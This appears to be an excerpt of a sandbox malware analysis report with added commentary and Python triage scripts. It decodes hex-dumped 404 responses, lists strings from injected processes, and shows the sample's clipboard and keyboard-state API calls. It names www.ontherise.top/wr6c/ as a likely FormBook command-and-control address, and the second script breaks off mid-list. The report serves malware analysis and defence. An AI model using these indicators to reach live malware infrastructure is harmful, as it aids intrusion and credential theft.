65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 14:05:24 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 
74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 14:05:27 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 
74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 14:05:30 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 
74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 14:05:32 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 
68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
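The "Data Raw" field of the record above is the response body as the sandbox captured it, printed as hex and cut off far short of the declared Content-Length of 16052 bytes. Decoding it is the fastest way to see what the contacted host actually served: a generic server 404 page, not a panel response. The script below is an added example and not part of the Joe Sandbox report. It splits one of these fused HTTP records into status line, headers and body, decodes the hex and extracts the page title and every absolute URL the page references. The embedded record is the beginning of the one above, truncated where this example truncates it; the list of header names used to split the header text is an assumption of the example.

```python
import re

# Header names used to split the header text the report prints without line breaks
# (an assumption of this example: extend the list if a record carries other headers).
KNOWN_HEADERS = ["Date", "Server", "Content-Length", "Connection", "Content-Type"]
_NEXT_HEADER = r"(?=(?:" + "|".join(map(re.escape, KNOWN_HEADERS)) + r"): |$)"
STATUS_RE = re.compile(r"^HTTP/(\d\.\d) (\d{3}) (.*?)" + _NEXT_HEADER)
HEADER_RE = re.compile(r"(" + "|".join(map(re.escape, KNOWN_HEADERS)) + r"): (.*?)" + _NEXT_HEADER)

# First part of the record shown in the report (status line, headers and the start of
# the "Data Raw" hex body, all run together as Joe Sandbox prints them).
RECORD = (
    "HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 14:05:32 GMTServer: Apache"
    "Content-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8"
    "Data Raw: "
    "3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a "
    "3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a "
    "20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a "
    "20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 "
    "68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 "
    "2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d "
    "69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 "
    "68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a"
)


def parse_http_record(record: str) -> dict:
    """Split a Joe Sandbox 'HTTP traffic detected' record and decode its hex body."""
    head, _, raw_hex = record.partition("Data Raw: ")
    status = STATUS_RE.match(head)
    if not status:
        raise ValueError("not an HTTP response record")
    headers = dict(HEADER_RE.findall(head))
    body_bytes = bytes.fromhex(raw_hex)          # whitespace between byte pairs is fine
    body = body_bytes.decode("utf-8", errors="replace")
    declared = int(headers.get("Content-Length", "0"))
    title = re.search(r"<title>(.*?)</title>", body, re.S)
    return {
        "status": int(status.group(2)),
        "reason": status.group(3),
        "headers": headers,
        "body": body,
        "title": title.group(1).strip() if title else None,
        # Absolute URLs the page references: these strings end up in the memory of
        # whichever process received the response, and are not indicators on their own.
        "external_refs": re.findall(r'(?:href|src)="(https?://[^"]+)"', body),
        "declared_length": declared,
        "captured_length": len(body_bytes),
        "truncated": len(body_bytes) < declared,
    }


if __name__ == "__main__":
    result = parse_http_record(RECORD)
    print(result["status"], result["reason"], result["title"])
    print("captured", result["captured_length"], "of", result["declared_length"], "bytes")
    print("references:", result["external_refs"])
```

A 404 from the contacted host does not show the infrastructure is dead: it only shows that this request, as the sandbox replayed it, did not hit a served path. The decoded body also explains why the cdnjs stylesheet URL later turns up as a string in the injected processes' memory.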
                Source: tzutil.exe, 0000000B.00000002.3118417486.0000000004E02000.00000004.10000000.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000002.3117680832.00000000038C2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
                Source: hKAQraLbCUKXj.exe, 0000000C.00000002.3119039119.0000000004E99000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ontherise.top
                Source: hKAQraLbCUKXj.exe, 0000000C.00000002.3119039119.0000000004E99000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ontherise.top/wr6c/
                Source: tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: tzutil.exe, 0000000B.00000002.3118417486.0000000004F94000.00000004.10000000.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000002.3117680832.0000000003A54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: tzutil.exe, 0000000B.00000002.3118417486.0000000004304000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3120076643.0000000006800000.00000004.00000800.00020000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000002.3117680832.0000000002DC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2016740097.0000000035E34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: tzutil.exe, 0000000B.00000002.3115425477.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: tzutil.exe, 0000000B.00000002.3115425477.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: tzutil.exe, 0000000B.00000002.3115425477.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: tzutil.exe, 0000000B.00000002.3115425477.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10336
                Source: tzutil.exe, 0000000B.00000002.3115425477.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: tzutil.exe, 0000000B.00000002.3115425477.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: tzutil.exe, 0000000B.00000003.1907373844.0000000008223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00964164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00964164
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00964164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00964164
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00963F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00963F66
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0095001C
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0097CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0097CABC
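Not every URL recovered from an injected process is an indicator. The Ecosia, DuckDuckGo and Yahoo endpoints above are default search-provider definitions read out of browser profile data, the login.live.com entries are Microsoft account OAuth endpoints that routinely sit in Windows process memory, and the cdnjs stylesheet URL is referenced by the 404 page body in the HTTP record at the top of this section. That leaves www.ontherise.top, found only in hKAQraLbCUKXj.exe, whose /wr6c/ path has the single short directory shape FormBook C2 URLs are known for. The script below is an added triage example, not Joe Sandbox output: it parses lines in the report's layout, reads the page protection out of the memory-dump name and sorts the URLs into buckets. The host allow-lists and my reading of the dump-name fields (PID, run, dump id, base address, protection, then region type) are assumptions of the example.

```python
import re
from urllib.parse import urlsplit

# Constructed subset of the "String found in binary or memory" lines above; the layout
# (source process, memory-dump name, label, URL) is copied from the report.
REPORT_LINES = [
    "Source: hKAQraLbCUKXj.exe, 0000000C.00000002.3119039119.0000000004E99000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ontherise.top",
    "Source: hKAQraLbCUKXj.exe, 0000000C.00000002.3119039119.0000000004E99000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ontherise.top/wr6c/",
    "Source: tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=",
    "Source: tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=",
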